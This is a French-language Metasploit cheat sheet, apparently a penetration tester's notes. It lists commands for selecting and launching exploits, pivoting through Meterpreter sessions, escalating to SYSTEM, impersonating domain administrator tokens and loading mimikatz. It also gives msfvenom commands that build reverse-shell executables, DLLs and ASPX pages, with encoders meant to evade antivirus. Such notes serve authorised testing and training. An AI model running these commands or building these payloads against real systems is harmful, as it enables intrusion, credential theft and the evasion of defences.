Renseignement
Rechercher un exploit
search < version / service name / port >
Structure
auxiliary/ # Module, such as scanners, crawlers and fuzzers, can be found here.
encoders/ # Will allow you to encode the exploit and payload in the hope that a signature-based antivirus solution may miss them
evasion/ # Will encode the payload to "try" evade antivirus software
exploit/ # Exploits, neatly organized by target system.
payloads/ # Code that will run on the target system.
├── adapters/ # An adapter wraps single payloads to convert them into different formats
├── singles/ # Self-contained payloads (add user, launch notepad.exe, etc.) that do not need to download an additional component to run.
├── stagers/ # Responsible for setting up a connection channel between Metasploit and the target system. Useful when working with staged payloads
└── stages/ # Downloaded by the stager.
post/ # post-exploitation module
Armement
Selectionner un exploit
use <exploit-path>
Annuler la selection
back
Afficher les options
show options
Afficher les payloads compatibles
show payloads
Configurer une option
set <option-name> <value>
Exploitation
Lancer l’exploit
exploit
Lancer des modules post exploitation
0xlun@Lunatik $ [CTR+Z]
msf5 > sessions -l
msf5 > use post/<path>
msf5 > set SESSION <session-id>
msf5 > run
Sessions
Mettre la session (terminal) en tâche de fond
[CTRL+Z]
Lister les sessions
sessions
Sélectionner une session
sessions -i <session-id>
Ajouter une route (meterpreter session as a proxy) :
route add <CIDR> <session-id>
route print
La session doit pouvoir se connecter au réseau rensigné. On peut récupérer les routes automatiquement avec autoroute :
use multi/manage/autoroute
show options
sessions -l
set session <session-id>
run
On peut ensuite accéder à ces routes via un proxy SOCKS
use auxiliary/server/socks_proxy
show options
set SRVHOST 127.0.0.1
set VERSION 5
run -j
Shell To Meterpreter
Via shell_to_meterpreter :
msf5 > use post/multi/manage/shell_to_meterpreter
msf5 > set SESSION <session-id>
msf5 > run
Via session :
sessions -u <session-id>
sessions -u -1 # For the last active session
Meterpreter
Lancement du client sur msfconsole
lun$ msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > show payloads
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 192.168.0.99
msf5 exploit(multi/handler) > set LPORT 443
msf5 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 192.168.0.99:443
Status d’activité de la machine :
idletime
Informations du système :
sysinfo
Téléchargement [ victim >> attacker ]
download <source> <destination>
Upload [ attacker >> victim ]
upload <source> <destination>
Executer une commande :
execute -f <command> -i -H
Obtenir un shell standard :
shell
Obtenir un shell powershell standard :
load powershell
powershell_shell
Devenir SYSTEM :
getuid
getsystem
getuid
Migration :
migrate <pid>
Commandes sur la machine locale :
lpwd = pwd
lcd = cd
lls = ls
lcat = cat
Obtenir le Integrity Level de notre process :
shell
powershell -ep bypass
Import-Module NtObjectManager
Get-NtTokenIntegrityLevel
Incognito
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > help
Incognito Commands
==================
Command Description
------- -----------
add_group_user Attempt to add a user to a global group with all tokens
add_localgroup_user Attempt to add a user to a local group with all tokens
add_user Attempt to add a user with all tokens
impersonate_token Impersonate specified token
list_tokens List tokens available under current user context
snarf_hashes Snarf challenge/response hashes for every token
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
SNEAKS.IN\Administrator
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > impersonate_token SNEAKS.IN\\Administrator
[+] Delegation token available
[+] Successfully impersonated user SNEAKS.IN\Administrator
meterpreter > getuid
Server username: SNEAKS.IN\Administrator
Post exploitation modules
msf5 > use <exploit>
msf6 exploit(<exploit>) > set SESSION <session-id>
msf6 exploit(<exploit>) > set LPORT <port>
msf6 exploit(<exploit>) > set LHOST <host>
msf6 exploit(<exploit>) > run
exploit/windows/local/bypassuac_sdclt #bypass UAC
exploit/windows/smb/psexec #psexec
post/multi/recon/local_exploit_suggester # exploit suggester
Charger le module mimikatz dans le shell :
meterpreter > load kiwi # mimikatz module
meterpreter > help
Msfvenom
Lister :
msfvenom -l payloads # Payloads
msfvenom -l encoders # Encoders
Payloads classiques :
windows/shell_reverse_tcp # x86 simple reverse shell
windows/x64/shell_reverse_tcp # x64 simple reverse shell
windows/meterpreter/reverse_tcp # x86 meterpreter reverse shell
windows/x64/meterpreter/reverse_tcp # x64 meterpreter reverse shell
linux/x86/shell_reverse_tcp # x86 simple reverse shell
linux/x64/shell_reverse_tcp # x64 simple reverse shell
linux/x86/meterpreter/reverse_tcp # x86 meterpreter reverse shell
linux/x64/meterpreter/reverse_tcp # x64 meterpreter reverse shell
Autres : msfvenom -l payloads
Lister les options de la payload :
msfvenom -p <payload/path> --list-options
Générer une EXE :
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe
msfvenom -p windows/meterpreter/bind_tcp LPORT=<PORT> -f exe -o bind.exe
Générer une DLL :
msfvenom -p <payload/path> <option>=<value> -f dll -o <dllname>.dll
Générer un aspx/asp :
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f asp > reverse.asp
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> -f aspx > reverse.aspx
Obfuscation :
msfvenom -p windows/meterpreter/reverse_tcp --encoder x86/shikata_ga_nai LHOST=<IP> LPORT=<PORT> -f exe -o reverse.exe
Formats (-f) :
# Executable formats
asp, aspx, aspx-exe, axis2, dll, elf, elf-so, exe, exe-only, exe-service, exe-small, hta-psh, jar, loop-vbs, macho, msi, msi-nouac, osx-app, psh, psh-cmd, psh-net, psh-reflection, vba, vba-exe, vba-psh, vbs, war
# Transform formats
bash, c, csharp, dw, dword, hex, java, js_be, js_le, num, perl, pl, powershell, ps1, py, python, raw, rb, ruby, sh, vbapplication, vbscr